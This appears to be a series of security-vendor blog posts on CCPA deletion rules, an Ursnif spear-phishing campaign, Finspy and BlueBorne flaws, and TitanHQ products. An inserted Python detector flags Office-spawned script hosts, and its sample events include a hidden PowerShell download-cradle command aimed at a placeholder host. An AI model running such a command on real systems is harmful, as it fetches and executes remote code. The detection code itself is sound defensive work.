Under CCPA, Californians can request to have their personal data deleted, but there are CCPA data deletion exceptions you should be aware of. Not all personal data needs to be deleted.
Who Must Comply with CCPA?
The California Consumer Privacy Act gave Californians new rights over their personal data. From January 1, 2020, organizations that conduct business in the state of California are required to comply with CCPA if they have annual gross revenues of more than $25 million, handle the personal data of 50,000 or more consumers, or derive more than 50% of their annual revenue from the sale of personal information.
The CCPA Right to Delete
One of the new rights given to consumers is the right to have their personal data deleted. CCPA applies to personal data that identifies, relates to, describes, or can be associated with an individual or household, directly or indirectly.
When consumers exercise the right to delete, organizations are required to comply within 45 days, but there are CCPA data deletion exceptions. If data is not going to be deleted, the consumer must be informed without unreasonable delay and no later than 45 days after the request has been received. This timescale does not apply to data contained in archive or backup systems. The deletion of personal data stored in an archive or backup can be delayed until the next time the archive or backup is accessed or used.
When a data deletion request is received, an organization must take reasonable steps to verify that the request has been sent by the individual to whom the data relates. All personal data must then be deleted; however, there are 9 CCPA data deletion exceptions.
CCPA Data Deletion Exceptions
Businesses are not required by law to delete data that is required to perform 9 specific activities:
Data does not need to be deleted if it is required to complete the transaction for which the data was collected or to provide goods or services that have been requested by the consumer. Data does not need to be deleted if it is “reasonably anticipated within the context of a business’s ongoing business relationship with the consumer, or otherwise perform a contract between the business and the consumer.”
If personal data, such as data contained in server logs, is needed to detect security incidents, to protect against malicious, deceptive, fraudulent or illegal activity, or to allow prosecution of the persons responsible for those activities, it does not need to be deleted.
Personal data does not need to be deleted if it is needed to debug, or to identify and repair, errors that impair existing functionality.
While the CCPA helps protect the privacy of consumers, it is secondary to free speech. Personal data does not need to be deleted in order to allow the exercise of free speech, to ensure the right of another consumer to exercise his or her right of free speech, or to exercise another right provided for by law.
Personal data does not need to be deleted if it is required to ensure compliance with the California Electronic Communications Privacy Act (CalECPA).
Personal data is excepted from deletion if it is required to comply with other legal obligations, such as data retention laws.
Research Conducted in the Public Interest
Personal information of consumers that is used for research conducted in the public interest does not need to be deleted. This includes personal data that is collected and maintained for peer-reviewed, scientific, historical, or statistical research in the public interest if deletion of the data would seriously impair the achievement of the research, provided the consumer has previously provided informed consent for their personal data to be used for research.
Expected Internal Uses
Data is exempt from deletion requests if it is required to enable solely internal uses reasonably aligned with the expectations of the consumer based on the consumer’s relationship with the business.
Other Internal Uses
Personal data does not need to be deleted if it is required for other internal uses which, in a lawful manner, are compatible with the context in which the consumer provided their personal data.
Enforcement of CCPA Compliance
The California Attorney General is tasked with enforcing compliance with CCPA and has the authority to issue financial penalties for noncompliance up to $2,500 per violation or $7,500 for an intentional violation. Californian consumers are permitted to take legal action against organizations over data breaches and can claim damages between $100 and $750 per data breach.
In this post we explain the CCPA requirements for businesses and the most important elements of the California Consumer Privacy Act.
What Businesses Must Comply with CCPA?
Unlike the EU’s General Data Protection Regulation (GDPR), which applies to all businesses that collect or process the data of EU residents, CCPA only applies to for-profit businesses that meet certain criteria. Any business that meets one or more of the criteria below is required to comply with CCPA.
- Has annual revenues of more than $25 million
- Collects information on 50,000 or more California households or residents each year
- Earns 50% or more of its annual revenue from the sale of the consumer data of California residents
These requirements may be updated or expanded to include a wider range of companies. Make sure you keep up to date with any changes to CCPA if you collect or process the data of U.S. consumers.
It is not just companies with a base in California that are required to comply with CCPA. Any company that does business in California or collects or processes the data of California residents is required to comply with CCPA.
What are the CCPA Consumer Rights?
CCPA was introduced to give California residents greater control over their personal data.
Consumer rights under CCPA include:
- Right to know what personal data is being collected
- Right to know what personal data is held by a company
- Right to know how personal data is being used by a company
- Restriction of the use and sale of personal data of minors (under 13) without parental consent
- Restriction of the use and sale of personal data of minors (13-16) without direct consent
- Right to delete all personal data held by a company
- Right to opt-out of having personal data sold
- Right to non-discrimination, in terms of price or services, if CCPA rights are exercised
- Right to take legal action against companies for privacy violations and the failure to honor CCPA rights
- Requests from consumers must be confirmed within 10 days and honored within 45 days
Key CCPA Requirements for Businesses
- Businesses must ensure consumers are notified about the collection of their personal data before data is collected and consumers should be given the option of opting out of the collection of their data or the sale of their data. Personal data should only be collected for specific and legitimate purposes.
- Maintain procedures to respond to requests from consumers to access their data, delete their data, and opt out of the sale of their personal information. Procedures must also be developed and maintained relating to the collection and use of the personal information of minors.
- Businesses must offer consumers two methods for consumers to request data and arrange to have their data deleted. One method that is mandatory is a toll-free telephone number. If a business primarily operates online, a web-based method should be offered.
- Any member of staff that handles consumer data must be trained on the requirements of CCPA. Oversight of compliance must be delegated to an individual or team.
- Businesses must verify the identity of the consumer before providing or deleting their data in response to a request.
- CCPA does not go as far as GDPR in terms of data security requirements for businesses. CCPA does not stipulate the security measures that must be implemented to protect consumer data, but it does require businesses to have adequate protections in place to safeguard consumer data, including measures to prevent unauthorized data access. Bear in mind that penalties can be imposed for data breaches and consumers can take legal action over the exposure of their data if the company holding that data has been negligent. Consumer lawsuits can require payment of up to $750 per consumer in the event of a CCPA violation and it is not necessary to provide proof of harm. A large data breach could therefore prove very costly.
How TitanHQ Can Help with CCPA Compliance
TitanHQ offers three solutions that can help with CCPA compliance: SpamTitan Email Security, WebTitan DNS Filtering, and ArcTitan Email Archiving.
- SpamTitan is a powerful email security solution that provides industry-leading protection against spam and the leading causes of data breaches – phishing attacks and malware infections.
- WebTitan is a DNS filtering solution that provides an additional level of protection against phishing attacks and malware. WebTitan blocks attempts by network users to access malicious websites such as those used for phishing or malware delivery, thus helping to prevent the exposure of consumer data.
- ArcTitan is an email archiving solution that helps businesses keep email data protected, meet email retention requirements, and quickly find and recover emails when dealing with customer complaints, demonstrating compliance, and for finding and deleting the data of consumers if a request to have data deleted is received.
A new strain of the Ursnif banking Trojan has been identified and the actors to blame for the latest campaign have implemented a new tactic to spread the malware more quickly.
The Ursnif banking Trojan is one of the most frequently encountered banking Trojans. As is the case with other banking Trojans, the purpose of Ursnif is to steal credentials such as logins to banking websites, corporate bank details, and credit card information. The stolen credentials are then used to complete fraudulent financial transactions. It is not unusual for accounts to be drained before the transactions are discovered, by which time the funds have cleared, have been withdrawn, and the criminal’s account has been closed. Recovering the stolen funds may not be possible.
Infection results in the malware stealing a wide range of sensitive data, capturing credentials as they are typed into the browser. The Ursnif banking Trojan also captures screenshots of the infected device and logs keystrokes. All of that information is silently sent to the attacker’s C2 server.
Banking Trojans can be distributed in a number of ways. They are often hosted on websites and downloaded in drive-by attacks. Traffic is directed to the malicious websites using malvertising campaigns or spam emails containing hyperlinks. Legitimate websites are compromised using brute force methods, and exploit kits installed on those sites attack visitors who have failed to keep their software up to date. In many cases, the malware is distributed via spam email, hidden in attachments.
Spam email has previously been used to distribute the Ursnif banking Trojan, and the most recent campaign is no different in that regard. However, the latest campaign uses a new tactic to increase the chance of infection and to spread infections more quickly and widely. Financial institutions have been the main target of this banking Trojan, but with this most recent attack method the infections are far more widespread.
Infection sees the user’s contact list scanned and spear phishing emails sent to each of the user’s contacts. Since the spear phishing emails come from a trusted email account, the chances of the emails being opened are significantly heightened. Simply opening the email will not lead to infection. For that to take place, the recipient must open the email attachment. Again, since it has come from a trusted person, that is more probable.
The actors behind this latest Ursnif banking Trojan campaign have another trick to increase trust and ensure their payload is delivered. The spear phishing emails contain message threads from past communications. The email looks like a reply to a previous email and includes details of past communications.
A short line of text is included in an attempt to get the recipient to open the email attachment – a Word document containing a malicious macro. The macro needs to be enabled by the recipient unless macros have been set to run automatically, and even then it does not execute until the Word document is closed. When the macro runs, it launches PowerShell commands that download the Ursnif Trojan, which then starts logging activity on the infected device and sends further spear phishing emails to the new victim’s contacts.
This is not an original tactic, but it is new to Ursnif – and it is likely to see infections spread much more swiftly. Additionally, the malware incorporates a number of additional tactics to hamper detection, allowing information to be stolen and bank accounts emptied before the infection is discovered – the Trojan even erases itself once it has run.
Malware is always changing, and new tactics are constantly created to increase the likelihood of infection. The most recent campaign shows just how important it is to block email threats before they reach end users’ inboxes.
If you use an advanced spam filter such as SpamTitan, malicious emails can be blocked before they reach end users’ inboxes, greatly reducing the danger posed by malware infections.
There is a cheaper option than Cisco OpenDNS that provides total protection against web-based threats. If you are currently using OpenDNS or have yet to implement a web filtering solution, you can find out about this powerful web filtering solution in a December 5, 2018 webinar.
Cybersecurity solutions can be implemented to secure the network perimeter, but employees are often careless online, which can lead to costly data breaches. The online activities of employees can easily result in malware, ransomware, and viruses being installed. Staff may also respond to malicious adverts (malvertising) or visit phishing websites where they are relieved of their login details.
Addressing malware infections, resolving ransomware attacks, and remediating phishing-related breaches have a negative impact on the business, and the resulting data breaches can be incredibly expensive. For this reason, the threat from web-based attacks cannot be disregarded.
Fortunately, there is an easy solution that offers protection against web-based threats by carefully managing the web content that employees can access: a DNS-based web filter.
DNS-based web filtering requires no hardware acquisitions and no software installations. Within around 5 minutes, a business will be able to control employee internet access and block web-based dangers. Some DNS-based web filters such as OpenDNS can be costly, but there is a more cost-effective alternative to Cisco OpenDNS.
TitanHQ and Celestix Networks will be conducting a joint webinar to introduce an alternative to Cisco OpenDNS – The WebTitan-powered solution, Celestix WebFilter Cloud.
The webinar will be presented by Rocco Donnino, TitanHQ EVP of Strategic Alliances, and Senior Sales Engineer Derek Higgins, who will outline how the DNS-based filtering technology offers total protection from web-based dangers at a fraction of the cost of OpenDNS.
The webinar is at 10:00 AM US Pacific Time on Wednesday December 5, 2018.
Microsoft has addressed 27 critical flaws this Patch Tuesday, including a Microsoft .Net Framework flaw that is being actively exploited to download Finspy surveillance software on devices running Windows 10.
Finspy is legitimate software created by the UK-based Gamma Group, which is used by governments globally for cyber-surveillance. According to FireEye researchers, the software has been deployed in at least two attacks in the past few months; the most recent attack leveraged the Microsoft .Net Framework flaw.
The attack begins with a spam email containing a malicious RTF file. The document exploits the CVE-2017-8759 vulnerability to execute arbitrary code, which installs and executes a VB script containing PowerShell commands, which in turn installs the malicious payload, including Finspy.
FireEye suggests at least one attack was conducted by a nation-state against a Russian target; however, FireEye researchers also believe other actors may be using the vulnerability to conduct attacks.
According to a blog post last Tuesday, the Microsoft .Net Framework flaw has been detected and mitigated. Microsoft strongly recommends installing the latest update promptly to minimize exposure. Microsoft says the flaw could permit a malicious actor to take full control of an affected system.
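Both chains on this page (the Ursnif Word macro that launches PowerShell, and the Finspy RTF that runs a VB script which runs PowerShell) leave the same footprint in endpoint telemetry: a script host whose process ancestry includes an Office application. The following detection logic is an added example, not code from either article or from TitanHQ; the process-creation events, paths and command lines are constructed for illustration and loosely modelled on Sysmon Event ID 1 fields.

```python
"""Flag script interpreters launched beneath an Office application.

Added example (not code from the articles or from TitanHQ). Office app -> script host
-> download is the footprint of both chains described on this page. Events are
constructed, loosely modelled on Sysmon Event ID 1 fields; none of it is real data.
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments that suggest a download stage (case-insensitive).
DOWNLOAD_HINT = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|https?://", re.I)

# Constructed sample telemetry: an Office-launched chain (200 -> 300 -> 400), a benign
# PowerShell started from Explorer (500), and a direct Office child with no download (600).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmd": "WINWORD.EXE /n invoice.doc"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe", "cmd": "wscript.exe stage.vbs"},
    {"pid": 400, "ppid": 300, "image": PS,
     "cmd": "powershell -w hidden -c (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')"},
    {"pid": 500, "ppid": 100, "image": PS, "cmd": "powershell Get-ChildItem"},
    {"pid": 600, "ppid": 200, "image": PS, "cmd": "powershell.exe -c Write-Host ok"},
]

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def ancestry(events, pid):
    """Image basenames from pid up to the root (or until the parent is unknown)."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:  # 'seen' guards against pid-reuse loops
        seen.add(pid)
        chain.append(_basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain

def score_event(events, event):
    """Finding for a script host descended from an Office app, else None.
    Severity is 'high' when the command line also looks like a download stage."""
    host = _basename(event["image"])
    if host not in SCRIPT_HOSTS:
        return None
    office = next((a for a in ancestry(events, event["pid"])[1:] if a in OFFICE_APPS), None)
    if office is None:
        return None
    severity = "high" if DOWNLOAD_HINT.search(event["cmd"]) else "medium"
    return {"pid": event["pid"], "host": host, "via": office, "severity": severity}

def detect(events):
    """Apply score_event to every event, keeping input order."""
    return [f for f in (score_event(events, e) for e in events) if f]
```

Walking the full ancestry rather than only the direct parent is what catches the Finspy-style chain, where PowerShell is a grandchild of the Office process via the VB script host.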
Several Bluetooth flaws were disclosed on Tuesday by security company Armis. The flaws affect billions of Bluetooth-enabled devices around the globe. The eight flaws, referred to as BlueBorne, could be used to carry out man-in-the-middle attacks on devices via Bluetooth, redirecting traffic to the attacker’s computer. The bugs exist in Windows, iOS, Android and Linux.
In order to exploit the flaws, Bluetooth would need to be turned on on the targeted device, although it would not be necessary for the device to be in discoverable mode. An attacker could use the flaws to connect to a device – a TV or speaker for example – and establish a connection to a computer without the user’s knowledge. To carry out the attack, the attacker would need to be in relatively close physical proximity to the targeted device.
In addition to intercepting communications, an attacker could also take full control of a device and steal data, install ransomware or malware, or perform other malicious activities such as enrolling the device in a botnet. Microsoft addressed one of the Bluetooth driver spoofing bugs – CVE-2017-8628 – in the latest round of updates.
One of the most pressing updates is for a remote code execution vulnerability in NetBIOS (CVE-2017-0161). The vulnerability affects both servers and workstations. While the vulnerability is not thought to be currently exploited in the wild, it is notable because it can be exploited simply by sending specially crafted NetBT Session Service packets.
The Zero Day Initiative (ZDI) said the flaw “is practically wormable within a Local Area Network. This could also target many virtual clients if the guest OSes all connect to the same (virtual) LAN.”
Overall, 81 updates have been published by Microsoft this Patch Tuesday. Adobe has addressed eight flaws, including two critical memory corruption bugs (CVE-2017-11281, CVE-2017-11282) in Flash Player, a critical XML parsing flaw in ColdFusion (CVE-2017-11286) and two ColdFusion remote code execution flaws (CVE-2017-11283, CVE-2017-11284) relating to deserialization of untrusted data.
In the United States, healthcare industry phishing campaigns have been to blame for exposing the protected health records of well in excess of 90 million Americans over the course of the past year. That’s more than 28% of the population of the United States.
This week, another case of healthcare sector phishing has come to light following the announcement of Connecticut’s Middlesex Hospital data breach. The hospital discovered that four of its employees had responded to a phishing email, resulting in their email account login details being sent to an attacker’s command and control server. In this case the damage inflicted by the phishing attack was limited, and only 946 patients had their data exposed. Other healthcare organizations have not been nearly so fortunate.